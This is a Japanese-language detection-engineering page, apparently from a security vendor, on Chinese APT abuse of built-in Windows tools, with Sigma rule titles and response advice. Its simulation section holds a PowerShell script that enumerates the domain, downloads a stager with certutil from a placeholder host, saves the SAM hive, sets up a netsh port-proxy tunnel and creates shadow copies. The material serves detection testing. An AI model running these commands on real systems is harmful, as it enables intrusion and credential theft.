フォローする 
要約
この記事は、中国の高度持続的脅威グループがどのようにWindowsの組み込みユーティリティ、しばしばLOLBASと呼ばれるものを悪用し、偵察、資格情報の窃取、環境内での横移動を行いながら日常の管理活動に溶け込むかを探っています。
調査
この記事では、次のようなネイティブツールの特定のコマンドライン使用が強調されています: nltest, certutil, netsh, reg.exe, vssadmin、およびその他のツールがあり、SIEMプラットフォーム内でこれらの手法を検出するのに役立つSigmaルールを指摘しています。
緩和策
防御者は、疑わしいネイティブWindowsバイナリの実行を監視し、最小権限アクセス制御を施行し、レジストリ変更を監査し、参照されたSigmaパターンに基づいた検出ロジックを展開するよう奨励されています。
対応策
疑わしいLOLBAS活動が識別された場合、セキュリティチームはアラートをトリガーし、影響を受けたホストを隔離し、関連ログを収集し、資格情報のダンプや横移動が発生したかどうかを確認し、結果として得られるアーティファクトの法医学的分析を行うべきです。
攻撃の流れ
この部分はまだ更新中です。通知を受け取るためにサインアップしてください
通知する検出
可能なシステム列挙 (cmdlineを通じて)
表示
アカウントまたはグループ列挙 / 操作の可能性 (cmdlineを通じて)
表示
疑わしいドメイントラストの発見 (cmdlineを通じて)
表示
LOLBAS wmic (cmdlineを通じて)
表示
LOLBAS DNSCmd (cmdlineを通じて)
表示
データエンコーディングと証明書操作のためのCertutilの使用 (cmdlineを通じて)
表示
疑わしいVSSADMIN活動 (cmdlineを通じて)
表示
SAM/SYSTEM/SECURITYのダンピングの可能性 (cmdlineを通じて)
表示
疑わしいNtdsutil活動 (cmdlineを通じて)
表示
シャドウコピー経由でSAM/SECURITY/NTDS.ditをコピーする疑わしい活動 (cmdlineを通じて)
表示
偵察と資格情報窃取用のWindowsユーティリティの疑わしい使用 [Windowsプロセス生成]
表示
シミュレーション実行
前提条件: テレメトリとベースラインのプレフライトチェックが完了していること。
理論: このセクションは、検出ルールをトリガーするために設計された敵対者の技術 (TTP) の正確な実行を詳しく説明しています。コマンドとナラティブは、識別されたTTPを直接反映し、検出ロジックが予想する正確なテレメトリを生成することを目的としています。
-
攻撃のナラティブとコマンド:
ドメインに参加しているWindowsワークステーションに初期の足場を確立した攻撃者は、ネイティブバイナリだけを使用してドメインをマッピングし、特権グループを列挙し、資格情報マテリアルを収集しようとします。手順は以下の通りです:
- ドメインコントローラの列挙:
nltest /dclist:domain.local– 目標ドメイン内のすべてのDCを公開します。 - システム情報を収集:
systeminfo– OSバージョン、パッチ、およびハードウェアの詳細を収集します。 - 実行中のプロセスを一覧表示:
tasklist– 特権サービスへの洞察を提供します。 - ログオンイベントのためのWindowsイベントログのクエリ:
Get-EventLog -LogName Security -InstanceId 4624(PowerShell) – 成功したログオンイベントを抽出します。 - 段階的ペイロードをダウンロード:
certutil -urlcache -split -f https://example.com/stager.exe C:WindowsTempstager.exe– certutilを使用してウェブフィルタリングを回避します。 - ローカル管理者を列挙:
net localgroup administrators– 特権アカウントを識別します。 - SAMレジストリハイブをエクスポート:
reg.exe save hklmsam C:sam.save– パスワードハッシュのダンプを試みます。 - ポートプロキシを作成して横移動を行う:
netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.0.0.5 connectport=3389– トンネルを準備します。 - DNSレコードを列挙:
dnscmd . /enumrecords /zone– 内部DNSゾーンを発見します。 - LDIFDEを通じてADオブジェクトをエクスポート:
ldifde.exe -f C:WindowsTempad_dump.txt -p subtree– ディレクトリデータを抽出します。 - ボリュームシャドウコピーを作成:
vssadmin create shadow /for=C:– ロックされたファイルへのファイルレベルのアクセスを有効にします。
各コマンドは、Sigmaルールの“CommandLine|contains”文字列のいずれかと完全に一致しており、その結果として生じるプロセス作成イベントでルールが発動することを保証します。
- ドメインコントローラの列挙:
-
回帰テストスクリプト: (PowerShell – 自己完結型、管理者権限が必要)
# TC-20260518-A7B9K – ネイティブWindowsユーティリティの敵対者使用をシミュレート # 注意: 管理特権を有するドメインに参加しているWindowsホスト上で実行します。 # 1. ドメインコントローラの列挙 nltest /dclist:domain.local # 2. システム情報 systeminfo # 3. プロセスリスト tasklist # 4. セキュリティイベントログの抽出 (PowerShell) Get-EventLog -LogName security -InstanceId 4624 # 5. certutilを介して段階的ペイロードをダウンロード certutil -urlcache -split -f https://example.com/stager.exe C:WindowsTempstager.exe # 6. ローカル管理者の列挙 net localgroup administrators # 7. SAMハイブのエクスポート reg.exe save hklmsam C:sam.save # 8. ポートプロキシの構成 netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.0.0.5 connectport=3389 # 9. DNSゾーンの列挙 dnscmd . /enumrecords /zone # 10. LDIFDEを使用してADデータをエクスポート ldifde.exe -f C:WindowsTempad_dump.txt -p subtree # 11. ボリュームシャドウコピーの作成 vssadmin create shadow /for=C: -
クリーンアップコマンド:
# シミュレーション中に作成されたファイルを削除 Remove-Item -Path C:WindowsTempstager.exe -ErrorAction SilentlyContinue Remove-Item -Path C:sam.save -ErrorAction SilentlyContinue Remove-Item -Path C:WindowsTempad_dump.txt -ErrorAction SilentlyContinue # ポートプロキシルールを削除 netsh interface portproxy delete v4tov4 listenport=4444 # シャドウコピーを削除 (オプション – シャドウコピーIDが必要) # vssadmin delete shadows /for=C: /all /quiet